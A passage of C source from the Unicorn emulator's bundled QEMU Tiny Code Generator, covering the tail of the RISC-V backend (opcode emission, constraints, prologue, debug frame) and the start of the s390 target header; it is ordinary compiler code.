tcg_out_opc_reg(s, OPC_ADD, base, TCG_GUEST_BASE_REG, addr_regl); } tcg_out_qemu_ld_direct(s, data_regl, data_regh, base, opc, is_64); #endif } static void tcg_out_qemu_st_direct(TCGContext *s, TCGReg lo, TCGReg hi, TCGReg base, MemOp opc) { const MemOp bswap = opc & MO_BSWAP; /* We don't yet handle byteswapping, assert */ g_assert(!bswap); switch (opc & (MO_SSIZE)) { case MO_8: tcg_out_opc_store(s, OPC_SB, base, lo, 0); break; case MO_16: tcg_out_opc_store(s, OPC_SH, base, lo, 0); break; case MO_32: tcg_out_opc_store(s, OPC_SW, base, lo, 0); break; case MO_64: if (TCG_TARGET_REG_BITS == 64) { tcg_out_opc_store(s, OPC_SD, base, lo, 0); } else { tcg_out_opc_store(s, OPC_SW, base, lo, 0); tcg_out_opc_store(s, OPC_SW, base, hi, 4); } break; default: g_assert_not_reached(); } } static void tcg_out_qemu_st(TCGContext *s, const TCGArg *args, bool is_64) { TCGReg addr_regl, addr_regh __attribute__((unused)); TCGReg data_regl, data_regh; TCGMemOpIdx oi; MemOp opc; #if defined(CONFIG_SOFTMMU) tcg_insn_unit *label_ptr[1]; #endif TCGReg base = TCG_REG_TMP0; data_regl = *args++; data_regh = (TCG_TARGET_REG_BITS == 32 && is_64 ? *args++ : 0); addr_regl = *args++; addr_regh = (TCG_TARGET_REG_BITS < TARGET_LONG_BITS ? *args++ : 0); oi = *args++; opc = get_memop(oi); #if defined(CONFIG_SOFTMMU) tcg_out_tlb_load(s, addr_regl, addr_regh, oi, label_ptr, 0); tcg_out_qemu_st_direct(s, data_regl, data_regh, base, opc); add_qemu_ldst_label(s, 0, oi, (is_64 ? TCG_TYPE_I64 : TCG_TYPE_I32), data_regl, data_regh, addr_regl, addr_regh, s->code_ptr, label_ptr); #else if (TCG_TARGET_REG_BITS > TARGET_LONG_BITS) { tcg_out_ext32u(s, base, addr_regl); addr_regl = base; } if (guest_base == 0) { tcg_out_opc_reg(s, OPC_ADD, base, addr_regl, TCG_REG_ZERO); } else { tcg_out_opc_reg(s, OPC_ADD, base, TCG_GUEST_BASE_REG, addr_regl); } tcg_out_qemu_st_direct(s, data_regl, data_regh, base, opc); #endif } static tcg_insn_unit *tb_ret_addr; static void tcg_out_op(TCGContext *s, TCGOpcode opc, const TCGArg *args, const int *const_args) { TCGArg a0 = args[0]; TCGArg a1 = args[1]; TCGArg a2 = args[2]; int c2 = const_args[2]; switch (opc) { case INDEX_op_exit_tb: /* Reuse the zeroing that exists for goto_ptr. 
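   An exit_tb with a return value of 0 can branch straight to the
   shared epilogue entry (code_gen_epilogue), which already moves zero
   into A0; only non-zero values need the explicit movi before
   jumping to tb_ret_addr.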
*/ if (a0 == 0) { tcg_out_call_int(s, s->code_gen_epilogue, true); } else { tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_A0, a0); tcg_out_call_int(s, tb_ret_addr, true); } break; case INDEX_op_goto_tb: assert(s->tb_jmp_insn_offset == 0); /* indirect jump method */ tcg_out_ld(s, TCG_TYPE_PTR, TCG_REG_TMP0, TCG_REG_ZERO, (uintptr_t)(s->tb_jmp_target_addr + a0)); tcg_out_opc_imm(s, OPC_JALR, TCG_REG_ZERO, TCG_REG_TMP0, 0); set_jmp_reset_offset(s, a0); break; case INDEX_op_goto_ptr: tcg_out_opc_imm(s, OPC_JALR, TCG_REG_ZERO, a0, 0); break; case INDEX_op_br: tcg_out_reloc(s, s->code_ptr, R_RISCV_JAL, arg_label(a0), 0); tcg_out_opc_jump(s, OPC_JAL, TCG_REG_ZERO, 0); break; case INDEX_op_ld8u_i32: case INDEX_op_ld8u_i64: tcg_out_ldst(s, OPC_LBU, a0, a1, a2); break; case INDEX_op_ld8s_i32: case INDEX_op_ld8s_i64: tcg_out_ldst(s, OPC_LB, a0, a1, a2); break; case INDEX_op_ld16u_i32: case INDEX_op_ld16u_i64: tcg_out_ldst(s, OPC_LHU, a0, a1, a2); break; case INDEX_op_ld16s_i32: case INDEX_op_ld16s_i64: tcg_out_ldst(s, OPC_LH, a0, a1, a2); break; case INDEX_op_ld32u_i64: tcg_out_ldst(s, OPC_LWU, a0, a1, a2); break; case INDEX_op_ld_i32: case INDEX_op_ld32s_i64: tcg_out_ldst(s, OPC_LW, a0, a1, a2); break; case INDEX_op_ld_i64: tcg_out_ldst(s, OPC_LD, a0, a1, a2); break; case INDEX_op_st8_i32: case INDEX_op_st8_i64: tcg_out_ldst(s, OPC_SB, a0, a1, a2); break; case INDEX_op_st16_i32: case INDEX_op_st16_i64: tcg_out_ldst(s, OPC_SH, a0, a1, a2); break; case INDEX_op_st_i32: case INDEX_op_st32_i64: tcg_out_ldst(s, OPC_SW, a0, a1, a2); break; case INDEX_op_st_i64: tcg_out_ldst(s, OPC_SD, a0, a1, a2); break; case INDEX_op_add_i32: if (c2) { tcg_out_opc_imm(s, OPC_ADDIW, a0, a1, a2); } else { tcg_out_opc_reg(s, OPC_ADDW, a0, a1, a2); } break; case INDEX_op_add_i64: if (c2) { tcg_out_opc_imm(s, OPC_ADDI, a0, a1, a2); } else { tcg_out_opc_reg(s, OPC_ADD, a0, a1, a2); } break; case INDEX_op_sub_i32: if (c2) { tcg_out_opc_imm(s, OPC_ADDIW, a0, a1, -a2); } else { tcg_out_opc_reg(s, OPC_SUBW, a0, a1, a2); } break; case INDEX_op_sub_i64: if (c2) { tcg_out_opc_imm(s, OPC_ADDI, a0, a1, -a2); } else { tcg_out_opc_reg(s, OPC_SUB, a0, a1, a2); } break; case INDEX_op_and_i32: case INDEX_op_and_i64: if (c2) { tcg_out_opc_imm(s, OPC_ANDI, a0, a1, a2); } else { tcg_out_opc_reg(s, OPC_AND, a0, a1, a2); } break; case INDEX_op_or_i32: case INDEX_op_or_i64: if (c2) { tcg_out_opc_imm(s, OPC_ORI, a0, a1, a2); } else { tcg_out_opc_reg(s, OPC_OR, a0, a1, a2); } break; case INDEX_op_xor_i32: case INDEX_op_xor_i64: if (c2) { tcg_out_opc_imm(s, OPC_XORI, a0, a1, a2); } else { tcg_out_opc_reg(s, OPC_XOR, a0, a1, a2); } break; case INDEX_op_not_i32: case INDEX_op_not_i64: tcg_out_opc_imm(s, OPC_XORI, a0, a1, -1); break; case INDEX_op_neg_i32: tcg_out_opc_reg(s, OPC_SUBW, a0, TCG_REG_ZERO, a1); break; case INDEX_op_neg_i64: tcg_out_opc_reg(s, OPC_SUB, a0, TCG_REG_ZERO, a1); break; case INDEX_op_mul_i32: tcg_out_opc_reg(s, OPC_MULW, a0, a1, a2); break; case INDEX_op_mul_i64: tcg_out_opc_reg(s, OPC_MUL, a0, a1, a2); break; case INDEX_op_div_i32: tcg_out_opc_reg(s, OPC_DIVW, a0, a1, a2); break; case INDEX_op_div_i64: tcg_out_opc_reg(s, OPC_DIV, a0, a1, a2); break; case INDEX_op_divu_i32: tcg_out_opc_reg(s, OPC_DIVUW, a0, a1, a2); break; case INDEX_op_divu_i64: tcg_out_opc_reg(s, OPC_DIVU, a0, a1, a2); break; case INDEX_op_rem_i32: tcg_out_opc_reg(s, OPC_REMW, a0, a1, a2); break; case INDEX_op_rem_i64: tcg_out_opc_reg(s, OPC_REM, a0, a1, a2); break; case INDEX_op_remu_i32: tcg_out_opc_reg(s, OPC_REMUW, a0, a1, a2); break; case INDEX_op_remu_i64: 
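        /* As with the other 32-bit arithmetic cases above, the _i32
           variants use the RV64 "W" opcodes (ADDW, SUBW, MULW, DIVW,
           REMW, ...), which sign-extend their 32-bit result as TCG
           expects for i32 values on a 64-bit backend; the _i64 cases
           use the full-width forms. */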
tcg_out_opc_reg(s, OPC_REMU, a0, a1, a2); break; case INDEX_op_shl_i32: if (c2) { tcg_out_opc_imm(s, OPC_SLLIW, a0, a1, a2); } else { tcg_out_opc_reg(s, OPC_SLLW, a0, a1, a2); } break; case INDEX_op_shl_i64: if (c2) { tcg_out_opc_imm(s, OPC_SLLI, a0, a1, a2); } else { tcg_out_opc_reg(s, OPC_SLL, a0, a1, a2); } break; case INDEX_op_shr_i32: if (c2) { tcg_out_opc_imm(s, OPC_SRLIW, a0, a1, a2); } else { tcg_out_opc_reg(s, OPC_SRLW, a0, a1, a2); } break; case INDEX_op_shr_i64: if (c2) { tcg_out_opc_imm(s, OPC_SRLI, a0, a1, a2); } else { tcg_out_opc_reg(s, OPC_SRL, a0, a1, a2); } break; case INDEX_op_sar_i32: if (c2) { tcg_out_opc_imm(s, OPC_SRAIW, a0, a1, a2); } else { tcg_out_opc_reg(s, OPC_SRAW, a0, a1, a2); } break; case INDEX_op_sar_i64: if (c2) { tcg_out_opc_imm(s, OPC_SRAI, a0, a1, a2); } else { tcg_out_opc_reg(s, OPC_SRA, a0, a1, a2); } break; case INDEX_op_add2_i32: tcg_out_addsub2(s, a0, a1, a2, args[3], args[4], args[5], const_args[4], const_args[5], false, true); break; case INDEX_op_add2_i64: tcg_out_addsub2(s, a0, a1, a2, args[3], args[4], args[5], const_args[4], const_args[5], false, false); break; case INDEX_op_sub2_i32: tcg_out_addsub2(s, a0, a1, a2, args[3], args[4], args[5], const_args[4], const_args[5], true, true); break; case INDEX_op_sub2_i64: tcg_out_addsub2(s, a0, a1, a2, args[3], args[4], args[5], const_args[4], const_args[5], true, false); break; case INDEX_op_brcond_i32: case INDEX_op_brcond_i64: tcg_out_brcond(s, a2, a0, a1, arg_label(args[3])); break; case INDEX_op_brcond2_i32: tcg_out_brcond2(s, args[4], a0, a1, a2, args[3], arg_label(args[5])); break; case INDEX_op_setcond_i32: case INDEX_op_setcond_i64: tcg_out_setcond(s, args[3], a0, a1, a2); break; case INDEX_op_setcond2_i32: tcg_out_setcond2(s, args[5], a0, a1, a2, args[3], args[4]); break; case INDEX_op_qemu_ld_i32: tcg_out_qemu_ld(s, args, false); break; case INDEX_op_qemu_ld_i64: tcg_out_qemu_ld(s, args, true); break; case INDEX_op_qemu_st_i32: tcg_out_qemu_st(s, args, false); break; case INDEX_op_qemu_st_i64: tcg_out_qemu_st(s, args, true); break; case INDEX_op_ext8u_i32: case INDEX_op_ext8u_i64: tcg_out_ext8u(s, a0, a1); break; case INDEX_op_ext16u_i32: case INDEX_op_ext16u_i64: tcg_out_ext16u(s, a0, a1); break; case INDEX_op_ext32u_i64: case INDEX_op_extu_i32_i64: tcg_out_ext32u(s, a0, a1); break; case INDEX_op_ext8s_i32: case INDEX_op_ext8s_i64: tcg_out_ext8s(s, a0, a1); break; case INDEX_op_ext16s_i32: case INDEX_op_ext16s_i64: tcg_out_ext16s(s, a0, a1); break; case INDEX_op_ext32s_i64: case INDEX_op_extrl_i64_i32: case INDEX_op_ext_i32_i64: tcg_out_ext32s(s, a0, a1); break; case INDEX_op_extrh_i64_i32: tcg_out_opc_imm(s, OPC_SRAI, a0, a1, 32); break; case INDEX_op_mulsh_i32: case INDEX_op_mulsh_i64: tcg_out_opc_reg(s, OPC_MULH, a0, a1, a2); break; case INDEX_op_muluh_i32: case INDEX_op_muluh_i64: tcg_out_opc_reg(s, OPC_MULHU, a0, a1, a2); break; case INDEX_op_mb: tcg_out_mb(s, a0); break; case INDEX_op_mov_i32: /* Always emitted via tcg_out_mov. */ case INDEX_op_mov_i64: case INDEX_op_movi_i32: /* Always emitted via tcg_out_movi. */ case INDEX_op_movi_i64: case INDEX_op_call: /* Always emitted via tcg_out_call. 
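   These opcodes never reach this switch: mov/movi/call are emitted
   directly by the common TCG code through tcg_out_mov, tcg_out_movi
   and tcg_out_call, so hitting one of them here indicates a backend
   bug and falls through to g_assert_not_reached.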
*/ default: g_assert_not_reached(); } } static const TCGTargetOpDef *tcg_target_op_def(TCGOpcode op) { static const TCGTargetOpDef r = { .args_ct_str = { "r" } }; static const TCGTargetOpDef r_r = { .args_ct_str = { "r", "r" } }; static const TCGTargetOpDef rZ_r = { .args_ct_str = { "rZ", "r" } }; static const TCGTargetOpDef rZ_rZ = { .args_ct_str = { "rZ", "rZ" } }; static const TCGTargetOpDef rZ_rZ_rZ_rZ = { .args_ct_str = { "rZ", "rZ", "rZ", "rZ" } }; static const TCGTargetOpDef r_r_ri = { .args_ct_str = { "r", "r", "ri" } }; static const TCGTargetOpDef r_r_rI = { .args_ct_str = { "r", "r", "rI" } }; static const TCGTargetOpDef r_rZ_rN = { .args_ct_str = { "r", "rZ", "rN" } }; static const TCGTargetOpDef r_rZ_rZ = { .args_ct_str = { "r", "rZ", "rZ" } }; static const TCGTargetOpDef r_rZ_rZ_rZ_rZ = { .args_ct_str = { "r", "rZ", "rZ", "rZ", "rZ" } }; static const TCGTargetOpDef r_L = { .args_ct_str = { "r", "L" } }; static const TCGTargetOpDef r_r_L = { .args_ct_str = { "r", "r", "L" } }; static const TCGTargetOpDef r_L_L = { .args_ct_str = { "r", "L", "L" } }; static const TCGTargetOpDef r_r_L_L = { .args_ct_str = { "r", "r", "L", "L" } }; static const TCGTargetOpDef LZ_L = { .args_ct_str = { "LZ", "L" } }; static const TCGTargetOpDef LZ_L_L = { .args_ct_str = { "LZ", "L", "L" } }; static const TCGTargetOpDef LZ_LZ_L = { .args_ct_str = { "LZ", "LZ", "L" } }; static const TCGTargetOpDef LZ_LZ_L_L = { .args_ct_str = { "LZ", "LZ", "L", "L" } }; static const TCGTargetOpDef r_r_rZ_rZ_rM_rM = { .args_ct_str = { "r", "r", "rZ", "rZ", "rM", "rM" } }; switch (op) { case INDEX_op_goto_ptr: return &r; case INDEX_op_ld8u_i32: case INDEX_op_ld8s_i32: case INDEX_op_ld16u_i32: case INDEX_op_ld16s_i32: case INDEX_op_ld_i32: case INDEX_op_not_i32: case INDEX_op_neg_i32: case INDEX_op_ld8u_i64: case INDEX_op_ld8s_i64: case INDEX_op_ld16u_i64: case INDEX_op_ld16s_i64: case INDEX_op_ld32s_i64: case INDEX_op_ld32u_i64: case INDEX_op_ld_i64: case INDEX_op_not_i64: case INDEX_op_neg_i64: case INDEX_op_ext8u_i32: case INDEX_op_ext8u_i64: case INDEX_op_ext16u_i32: case INDEX_op_ext16u_i64: case INDEX_op_ext32u_i64: case INDEX_op_extu_i32_i64: case INDEX_op_ext8s_i32: case INDEX_op_ext8s_i64: case INDEX_op_ext16s_i32: case INDEX_op_ext16s_i64: case INDEX_op_ext32s_i64: case INDEX_op_extrl_i64_i32: case INDEX_op_extrh_i64_i32: case INDEX_op_ext_i32_i64: return &r_r; case INDEX_op_st8_i32: case INDEX_op_st16_i32: case INDEX_op_st_i32: case INDEX_op_st8_i64: case INDEX_op_st16_i64: case INDEX_op_st32_i64: case INDEX_op_st_i64: return &rZ_r; case INDEX_op_add_i32: case INDEX_op_and_i32: case INDEX_op_or_i32: case INDEX_op_xor_i32: case INDEX_op_add_i64: case INDEX_op_and_i64: case INDEX_op_or_i64: case INDEX_op_xor_i64: return &r_r_rI; case INDEX_op_sub_i32: case INDEX_op_sub_i64: return &r_rZ_rN; case INDEX_op_mul_i32: case INDEX_op_mulsh_i32: case INDEX_op_muluh_i32: case INDEX_op_div_i32: case INDEX_op_divu_i32: case INDEX_op_rem_i32: case INDEX_op_remu_i32: case INDEX_op_setcond_i32: case INDEX_op_mul_i64: case INDEX_op_mulsh_i64: case INDEX_op_muluh_i64: case INDEX_op_div_i64: case INDEX_op_divu_i64: case INDEX_op_rem_i64: case INDEX_op_remu_i64: case INDEX_op_setcond_i64: return &r_rZ_rZ; case INDEX_op_shl_i32: case INDEX_op_shr_i32: case INDEX_op_sar_i32: case INDEX_op_shl_i64: case INDEX_op_shr_i64: case INDEX_op_sar_i64: return &r_r_ri; case INDEX_op_brcond_i32: case INDEX_op_brcond_i64: return &rZ_rZ; case INDEX_op_add2_i32: case INDEX_op_add2_i64: case INDEX_op_sub2_i32: case INDEX_op_sub2_i64: return 
&r_r_rZ_rZ_rM_rM; case INDEX_op_brcond2_i32: return &rZ_rZ_rZ_rZ; case INDEX_op_setcond2_i32: return &r_rZ_rZ_rZ_rZ; case INDEX_op_qemu_ld_i32: return TARGET_LONG_BITS <= TCG_TARGET_REG_BITS ? &r_L : &r_L_L; case INDEX_op_qemu_st_i32: return TARGET_LONG_BITS <= TCG_TARGET_REG_BITS ? &LZ_L : &LZ_L_L; case INDEX_op_qemu_ld_i64: return TCG_TARGET_REG_BITS == 64 ? &r_L : TARGET_LONG_BITS <= TCG_TARGET_REG_BITS ? &r_r_L : &r_r_L_L; case INDEX_op_qemu_st_i64: return TCG_TARGET_REG_BITS == 64 ? &LZ_L : TARGET_LONG_BITS <= TCG_TARGET_REG_BITS ? &LZ_LZ_L : &LZ_LZ_L_L; default: return NULL; } } static const int tcg_target_callee_save_regs[] = { TCG_REG_S0, /* used for the global env (TCG_AREG0) */ TCG_REG_S1, TCG_REG_S2, TCG_REG_S3, TCG_REG_S4, TCG_REG_S5, TCG_REG_S6, TCG_REG_S7, TCG_REG_S8, TCG_REG_S9, TCG_REG_S10, TCG_REG_S11, TCG_REG_RA, /* should be last for ABI compliance */ }; /* Stack frame parameters. */ #define REG_SIZE (TCG_TARGET_REG_BITS / 8) #define SAVE_SIZE ((int)ARRAY_SIZE(tcg_target_callee_save_regs) * REG_SIZE) #define TEMP_SIZE (CPU_TEMP_BUF_NLONGS * (int)sizeof(long)) #define FRAME_SIZE ((TCG_STATIC_CALL_ARGS_SIZE + TEMP_SIZE + SAVE_SIZE \ + TCG_TARGET_STACK_ALIGN - 1) \ & -TCG_TARGET_STACK_ALIGN) #define SAVE_OFS (TCG_STATIC_CALL_ARGS_SIZE + TEMP_SIZE) /* We're expecting to be able to use an immediate for frame allocation. */ QEMU_BUILD_BUG_ON(FRAME_SIZE > 0x7ff); /* Generate global QEMU prologue and epilogue code */ static void tcg_target_qemu_prologue(TCGContext *s) { int i; tcg_set_frame(s, TCG_REG_SP, TCG_STATIC_CALL_ARGS_SIZE, TEMP_SIZE); /* TB prologue */ tcg_out_opc_imm(s, OPC_ADDI, TCG_REG_SP, TCG_REG_SP, -FRAME_SIZE); for (i = 0; i < ARRAY_SIZE(tcg_target_callee_save_regs); i++) { tcg_out_st(s, TCG_TYPE_REG, tcg_target_callee_save_regs[i], TCG_REG_SP, SAVE_OFS + i * REG_SIZE); } #if !defined(CONFIG_SOFTMMU) tcg_out_movi(s, TCG_TYPE_PTR, TCG_GUEST_BASE_REG, guest_base); tcg_regset_set_reg(s->reserved_regs, TCG_GUEST_BASE_REG); #endif /* Call generated code */ tcg_out_mov(s, TCG_TYPE_PTR, TCG_AREG0, tcg_target_call_iarg_regs[0]); tcg_out_opc_imm(s, OPC_JALR, TCG_REG_ZERO, tcg_target_call_iarg_regs[1], 0); /* Return path for goto_ptr. 
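   This entry point is reached from goto_ptr when the computed target
   is NULL, and exit_tb with a zero value branches here as well (see
   tcg_out_op above).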
Set return value to 0 */ s->code_gen_epilogue = s->code_ptr; tcg_out_mov(s, TCG_TYPE_REG, TCG_REG_A0, TCG_REG_ZERO); /* TB epilogue */ tb_ret_addr = s->code_ptr; for (i = 0; i < ARRAY_SIZE(tcg_target_callee_save_regs); i++) { tcg_out_ld(s, TCG_TYPE_REG, tcg_target_callee_save_regs[i], TCG_REG_SP, SAVE_OFS + i * REG_SIZE); } tcg_out_opc_imm(s, OPC_ADDI, TCG_REG_SP, TCG_REG_SP, FRAME_SIZE); tcg_out_opc_imm(s, OPC_JALR, TCG_REG_ZERO, TCG_REG_RA, 0); } static void tcg_target_init(TCGContext *s) { s->tcg_target_available_regs[TCG_TYPE_I32] = 0xffffffff; if (TCG_TARGET_REG_BITS == 64) { s->tcg_target_available_regs[TCG_TYPE_I64] = 0xffffffff; } s->tcg_target_call_clobber_regs = -1u; tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_S0); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_S1); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_S2); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_S3); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_S4); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_S5); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_S6); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_S7); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_S8); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_S9); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_S10); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_S11); s->reserved_regs = 0; tcg_regset_set_reg(s->reserved_regs, TCG_REG_ZERO); tcg_regset_set_reg(s->reserved_regs, TCG_REG_TMP0); tcg_regset_set_reg(s->reserved_regs, TCG_REG_TMP1); tcg_regset_set_reg(s->reserved_regs, TCG_REG_TMP2); tcg_regset_set_reg(s->reserved_regs, TCG_REG_SP); tcg_regset_set_reg(s->reserved_regs, TCG_REG_GP); tcg_regset_set_reg(s->reserved_regs, TCG_REG_TP); } typedef struct { DebugFrameHeader h; uint8_t fde_def_cfa[4]; uint8_t fde_reg_ofs[ARRAY_SIZE(tcg_target_callee_save_regs) * 2]; } DebugFrame; #define ELF_HOST_MACHINE EM_RISCV static const DebugFrame debug_frame = { .h.cie.len = sizeof(DebugFrameCIE) - 4, /* length after .len member */ .h.cie.id = -1, .h.cie.version = 1, .h.cie.code_align = 1, .h.cie.data_align = -(TCG_TARGET_REG_BITS / 8) & 0x7f, /* sleb128 */ .h.cie.return_column = TCG_REG_RA, /* Total FDE size does not include the "len" member. */ .h.fde.len = sizeof(DebugFrame) - offsetof(DebugFrame, h.fde.cie_offset), .fde_def_cfa = { 12, TCG_REG_SP, /* DW_CFA_def_cfa sp, ... */ (FRAME_SIZE & 0x7f) | 0x80, /* ... 
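   encoded as unsigned LEB128, low 7 bits first with the continuation
   bit 0x80 set: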
uleb128 FRAME_SIZE */ (FRAME_SIZE >> 7) }, .fde_reg_ofs = { 0x80 + 9, 12, /* DW_CFA_offset, s1, -96 */ 0x80 + 18, 11, /* DW_CFA_offset, s2, -88 */ 0x80 + 19, 10, /* DW_CFA_offset, s3, -80 */ 0x80 + 20, 9, /* DW_CFA_offset, s4, -72 */ 0x80 + 21, 8, /* DW_CFA_offset, s5, -64 */ 0x80 + 22, 7, /* DW_CFA_offset, s6, -56 */ 0x80 + 23, 6, /* DW_CFA_offset, s7, -48 */ 0x80 + 24, 5, /* DW_CFA_offset, s8, -40 */ 0x80 + 25, 4, /* DW_CFA_offset, s9, -32 */ 0x80 + 26, 3, /* DW_CFA_offset, s10, -24 */ 0x80 + 27, 2, /* DW_CFA_offset, s11, -16 */ 0x80 + 1, 1, /* DW_CFA_offset, ra, -8 */ } }; void tcg_register_jit(TCGContext *s, void *buf, size_t buf_size) { tcg_register_jit_int(s, buf, buf_size, &debug_frame, sizeof(debug_frame)); }

unicorn-2.1.1/qemu/tcg/s390/tcg-target.h

/* * Tiny Code Generator for QEMU * * Copyright (c) 2009 Ulrich Hecht <uli@suse.de> * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ #ifndef S390_TCG_TARGET_H #define S390_TCG_TARGET_H #define TCG_TARGET_INSN_UNIT_SIZE 2 #define TCG_TARGET_TLB_DISPLACEMENT_BITS 19 typedef enum TCGReg { TCG_REG_R0 = 0, TCG_REG_R1, TCG_REG_R2, TCG_REG_R3, TCG_REG_R4, TCG_REG_R5, TCG_REG_R6, TCG_REG_R7, TCG_REG_R8, TCG_REG_R9, TCG_REG_R10, TCG_REG_R11, TCG_REG_R12, TCG_REG_R13, TCG_REG_R14, TCG_REG_R15 } TCGReg; #define TCG_TARGET_NB_REGS 16 /* A list of relevant facilities used by this translator. Some of these are required for proper operation, and these are checked at startup.
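   Facility numbers follow the z/Architecture convention that bit 0 is
   the most significant bit of the facility list, hence the
   (1ULL << (63 - n)) encoding below; e.g. the extended-immediate
   facility is number 21 and is tested as bit 63 - 21 = 42 of the
   doubleword queried at startup.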
*/ #define FACILITY_ZARCH_ACTIVE (1ULL << (63 - 2)) #define FACILITY_LONG_DISP (1ULL << (63 - 18)) #define FACILITY_EXT_IMM (1ULL << (63 - 21)) #define FACILITY_GEN_INST_EXT (1ULL << (63 - 34)) #define FACILITY_LOAD_ON_COND (1ULL << (63 - 45)) #define FACILITY_FAST_BCR_SER FACILITY_LOAD_ON_COND #define FACILITY_DISTINCT_OPS FACILITY_LOAD_ON_COND #define FACILITY_LOAD_ON_COND2 (1ULL << (63 - 53)) extern uint64_t s390_facilities; /* optional instructions */ #define TCG_TARGET_HAS_div2_i32 1 #define TCG_TARGET_HAS_rot_i32 1 #define TCG_TARGET_HAS_ext8s_i32 1 #define TCG_TARGET_HAS_ext16s_i32 1 #define TCG_TARGET_HAS_ext8u_i32 1 #define TCG_TARGET_HAS_ext16u_i32 1 #define TCG_TARGET_HAS_bswap16_i32 1 #define TCG_TARGET_HAS_bswap32_i32 1 #define TCG_TARGET_HAS_not_i32 0 #define TCG_TARGET_HAS_neg_i32 1 #define TCG_TARGET_HAS_andc_i32 0 #define TCG_TARGET_HAS_orc_i32 0 #define TCG_TARGET_HAS_eqv_i32 0 #define TCG_TARGET_HAS_nand_i32 0 #define TCG_TARGET_HAS_nor_i32 0 #define TCG_TARGET_HAS_clz_i32 0 #define TCG_TARGET_HAS_ctz_i32 0 #define TCG_TARGET_HAS_ctpop_i32 0 #define TCG_TARGET_HAS_deposit_i32 (s390_facilities & FACILITY_GEN_INST_EXT) #define TCG_TARGET_HAS_extract_i32 (s390_facilities & FACILITY_GEN_INST_EXT) #define TCG_TARGET_HAS_sextract_i32 0 #define TCG_TARGET_HAS_extract2_i32 0 #define TCG_TARGET_HAS_movcond_i32 1 #define TCG_TARGET_HAS_add2_i32 1 #define TCG_TARGET_HAS_sub2_i32 1 #define TCG_TARGET_HAS_mulu2_i32 0 #define TCG_TARGET_HAS_muls2_i32 0 #define TCG_TARGET_HAS_muluh_i32 0 #define TCG_TARGET_HAS_mulsh_i32 0 #define TCG_TARGET_HAS_extrl_i64_i32 0 #define TCG_TARGET_HAS_extrh_i64_i32 0 #define TCG_TARGET_HAS_goto_ptr 1 #define TCG_TARGET_HAS_direct_jump (s390_facilities & FACILITY_GEN_INST_EXT) #define TCG_TARGET_HAS_div2_i64 1 #define TCG_TARGET_HAS_rot_i64 1 #define TCG_TARGET_HAS_ext8s_i64 1 #define TCG_TARGET_HAS_ext16s_i64 1 #define TCG_TARGET_HAS_ext32s_i64 1 #define TCG_TARGET_HAS_ext8u_i64 1 #define TCG_TARGET_HAS_ext16u_i64 1 #define TCG_TARGET_HAS_ext32u_i64 1 #define TCG_TARGET_HAS_bswap16_i64 1 #define TCG_TARGET_HAS_bswap32_i64 1 #define TCG_TARGET_HAS_bswap64_i64 1 #define TCG_TARGET_HAS_not_i64 0 #define TCG_TARGET_HAS_neg_i64 1 #define TCG_TARGET_HAS_andc_i64 0 #define TCG_TARGET_HAS_orc_i64 0 #define TCG_TARGET_HAS_eqv_i64 0 #define TCG_TARGET_HAS_nand_i64 0 #define TCG_TARGET_HAS_nor_i64 0 #define TCG_TARGET_HAS_clz_i64 (s390_facilities & FACILITY_EXT_IMM) #define TCG_TARGET_HAS_ctz_i64 0 #define TCG_TARGET_HAS_ctpop_i64 0 #define TCG_TARGET_HAS_deposit_i64 (s390_facilities & FACILITY_GEN_INST_EXT) #define TCG_TARGET_HAS_extract_i64 (s390_facilities & FACILITY_GEN_INST_EXT) #define TCG_TARGET_HAS_sextract_i64 0 #define TCG_TARGET_HAS_extract2_i64 0 #define TCG_TARGET_HAS_movcond_i64 1 #define TCG_TARGET_HAS_add2_i64 1 #define TCG_TARGET_HAS_sub2_i64 1 #define TCG_TARGET_HAS_mulu2_i64 1 #define TCG_TARGET_HAS_muls2_i64 0 #define TCG_TARGET_HAS_muluh_i64 0 #define TCG_TARGET_HAS_mulsh_i64 0 /* used for function call generation */ #define TCG_REG_CALL_STACK TCG_REG_R15 #define TCG_TARGET_STACK_ALIGN 8 #define TCG_TARGET_CALL_STACK_OFFSET 160 #define TCG_TARGET_EXTEND_ARGS 1 #define TCG_TARGET_HAS_MEMORY_BSWAP 1 #define TCG_TARGET_DEFAULT_MO (TCG_MO_ALL & ~TCG_MO_ST_LD) enum { TCG_AREG0 = TCG_REG_R10, }; static inline void flush_icache_range(uintptr_t start, uintptr_t stop) { } static inline void tb_target_set_jmp_target(uintptr_t tc_ptr, uintptr_t jmp_addr, uintptr_t addr) { /* patch the branch destination */ intptr_t disp = addr - (jmp_addr - 2); 
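    /* jmp_addr points at the 32-bit displacement field of a BRCL,
       which sits 2 bytes past the start of the instruction; s390
       relative branches measure from the instruction start and count
       in halfwords, hence the (jmp_addr - 2) above and the disp / 2
       stored below. */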
